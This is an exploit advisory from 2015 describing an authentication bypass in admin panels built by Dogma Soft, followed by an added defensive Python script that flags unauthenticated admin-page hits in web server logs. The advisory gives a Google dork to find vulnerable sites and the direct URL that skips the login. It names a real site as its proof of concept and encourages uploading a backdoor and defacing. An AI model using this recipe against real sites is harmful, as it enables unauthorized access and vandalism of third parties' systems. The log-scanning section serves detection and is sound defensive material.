Dogma Soft Direct login to admin panel without entering password

2015.08.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

--------------------------------------------------------------------------------------------------------------
# Exploit Title: Direct login to admin panel without entering password
# Google Dork: ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd
# Date: 2015-08-25
# Exploit Author: Aaditya Purani
# Vendor Homepage: www.dogmaindia.com
# Software Link: No software link
# Version: Dogma Soft
# Tested on: Kali Linux/ Windows 7
# CVE : Critical Vulnerability

Hello,

This is Aaditya Purani and I have found a critical bug in websites which have been designed by dogmaindia.

First type the dork "ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd" in Google without the double quotes (").
Then find a site in which ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd is written in the footer.

Now, go to its admin page:
http://www.targetsite.com/admin

After opening the admin panel, follow this link:
http://www.targetsite.com/admin/home.php

And voila, you will be directly logged in to the admin panel and you can also upload your backdoor and deface.

#POC:

Site: http://tirupatiitc.com/
Its admin panel: http://tirupatiitc.com/admin/
Directly login to admin panel: http://tirupatiitc.com/admin/home.php

Thank you

Contact me:
https://securityresearchindia.wordpress.com
https://twitter.com/aaditya_purani
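
A defender-side check for the condition described above, added here as an example and not part of the original advisory: it scans a web server access log for admin pages served with 200 to clients that never completed a login. The log format (Apache/Nginx combined), the login paths, the 302-on-success convention and the sample lines are assumptions, not details from the advisory.

```python
import re

# Prefix of an Apache/Nginx "combined" access-log line: client, timestamp, request, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Assumptions (not from the advisory): the login form posts to one of these
# paths and a successful login is answered with a 302 redirect.
LOGIN_PATHS = {"/admin/", "/admin/index.php"}
LOGIN_OK_STATUS = "302"


def find_unauthenticated_admin_hits(lines):
    """Return (ip, timestamp, path) for each admin page served with 200 to a
    client that has no earlier successful login in the same log."""
    logged_in = set()
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines
        path = m["path"].split("?", 1)[0]  # ignore the query string
        if not path.startswith("/admin/"):
            continue
        if path in LOGIN_PATHS:  # the login page itself is public
            if m["method"] == "POST" and m["status"] == LOGIN_OK_STATUS:
                logged_in.add(m["ip"])
            continue
        if path.endswith(".php") and m["status"] == "200" and m["ip"] not in logged_in:
            findings.append((m["ip"], m["ts"], path))
    return findings


# Constructed sample log (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Aug/2015:10:00:01 +0000] "GET /admin/ HTTP/1.1" 200 1830 "-" "-"',
    '198.51.100.7 - - [25/Aug/2015:10:00:09 +0000] "POST /admin/ HTTP/1.1" 302 0 "-" "-"',
    '198.51.100.7 - - [25/Aug/2015:10:00:10 +0000] "GET /admin/home.php HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.50 - - [25/Aug/2015:10:02:05 +0000] "GET /admin/ HTTP/1.1" 200 1830 "-" "-"',
    '203.0.113.50 - - [25/Aug/2015:10:02:11 +0000] "GET /admin/home.php HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.9 - - [25/Aug/2015:10:05:40 +0000] "GET /admin/home.php HTTP/1.1" 302 0 "-" "-"',
    '192.0.2.9 - - [25/Aug/2015:10:05:41 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_unauthenticated_admin_hits(SAMPLE_LOG):
        print(hit)
```

Clients are keyed by IP address, so sessions that began before the log starts or users behind shared NAT can produce false results; treat hits as leads for review.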

